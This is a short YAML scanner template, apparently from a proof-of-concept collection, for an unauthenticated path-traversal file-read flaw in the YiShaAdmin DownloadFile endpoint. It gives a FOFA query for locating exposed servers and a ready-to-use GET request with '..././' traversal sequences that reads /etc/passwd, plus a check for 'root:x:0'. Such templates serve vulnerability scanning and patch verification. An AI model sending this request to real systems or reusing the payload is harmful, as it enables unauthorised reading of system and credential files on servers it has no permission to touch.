product: YiShaAdmin
vName: YiShaAdmin DownloadFile本地文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication.
version: ''
note: ''
search:
  FOFA: app="YiShaAdmin"
protocol: http
link: https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0
      method: get
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
